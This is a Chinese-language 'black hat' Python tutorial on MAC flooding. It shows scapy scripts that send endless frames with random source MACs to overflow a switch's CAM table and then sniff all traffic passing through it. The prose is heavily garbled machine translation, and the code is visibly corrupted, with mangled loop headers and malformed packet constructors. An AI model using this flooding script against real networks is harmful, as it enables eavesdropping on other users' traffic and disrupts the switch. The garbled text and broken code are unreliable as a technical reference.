Menu
0 Comments

Python黑帽编程 3.3 MAC洪水攻击 – 玄魂工作室

习俗配电盘(我只测量法我礼物运用的共有的机具)。,鉴于知识最好的为了表述)在消息转发列队行进中依托对CAM表的查询来决定好好地的转发喷嘴,相符合的MAC的对应参加比赛的人不克不及在曲中找到。,大约消息帧将被处置为播送帧。。凸轮台的满足的是有限性的。,正是小半以协议约束可以存储器。,当凸轮表的MAC地址积累到上限时,新的参加比赛的人不熟练的添加到CAM表中。

由于前文准绳,我们家会获得知识诸如此类人恰好是风趣的气象。。PC陆续发送消息帧到未知到哪里。,而且每个包的源MAC地址是两样的。,当这些使成群以十足快的尖响发送时,在开始时间内敏捷地废话使脱轨的凸轮表。。这些伪造的MAC地址雇用了CAM表。,真马 C地址参加比赛的人无法进入CAM表。。经过配电盘的诸如此类法线单播消息帧都是PROC。。在这种情况下,配电盘被降解为集中器。。

当配电盘被降解为集中器后,,我们家可以监控连接到配电盘硕士的拿消息。。

自然,赠送的的共有的修理对ARP洪水的回答两样,现场测量法是不可缺少的的。。现时让我们家持续停止预调。。

编码技击术

有许多的方式来建造随机MAC和IP地址。,因地址的规范体式是在的。,打包起来从容的。。在这里要给每个人绍介的是scapy模块打中RandMAC和RandIP方式。这两种方式用于随机增大MAC地址和IP地址。,接纳模板参量的方式,增大赠送的段的地址。

譬如,上面的选定的遗传密码:

#!/usr/bin/python

from scapy.all import *

i=5

(i)

    print RandMAC()

    print RandIP()

    i=i-1

卒列举如下所示。:

图2

是否需求IP来增大合格的的制度段,您可以输出选定的的模板。。

#!/usr/bin/python

from scapy.all import *

i=5

(i)

    print RandIP(“.*”)

    i=i-1

运转卒列举如下:

图3

在求解随机成绩过后,现时让我们家思索多少的消息包可以积累到大约宾格的。让我们家,是否我们家的包中有选定的的源IP和MAC。,之后使脱轨将被记载上去。。

譬如ARP包:

Ether(SRC)RandMAC(),dst=FF:FF:FF:FF:FF:FFARP(OP)2,
psrc=
“”, hwdst=FF:FF:FF:FF:FF:FF)/Padding(负担)“X”*18))

譬如,ICMP包装盒。:

Ether(SRC)RandMAC(“*:*:*:*:*:*”),

dst=RandMAC(“*:*:*:*:*:*”)) / \

IP(SRC)RandIP(“*.*.*.*”),

dst=RandIP(“*.*.*.*”)) / \

ICMP()

处理了这两个感情成绩。,你可以写出全部的选定的遗传密码。:

图4

#!/usr/bin/python

import sys

from scapy.all import *

import time

iface=”eth0″

if Le())> 2

    iface=[1]

(1)

    packet= Ether(SRC)RandMAC(“*:*:*:*:*:*”),

                  dst=RandMAC(“*:*:*:*:*:*”)) / \

    IP(SRC)RandIP(“*.*.*.*”),

    dst=RandIP(“*.*.*.*”)) / \

    ICMP()

    ()

    sendp(packet,iface=iface,loop=0)

上述的选定的遗传密码陆续发送ICMP消息包。,来成功MAC洪水攻击。运转卒列举如下:

图5

2总结

在本条文中,预调中不留意新的东西值当议论。,认为会发生对兑换制度和以太网有必然的默认。。

下一节,让我们家探究对VLAN的攻击。。

VLAN攻击分岔已在WeChat订阅号中发行。,炽热的先生输出订阅号码(少于二维码),从菜单栏> Python黑帽预调,您可以进入。。

检查全部的导师的接连,请留意我的微信订阅号(宣匈521),低维二维码,恢复女用长围巾。成绩议论请加QQ群。:Hacking (1群):303242737   Hacking (2群):147098303。

 

难以理解的灵魂办事处

发表评论

电子邮件地址不会被公开。 必填项已用*标注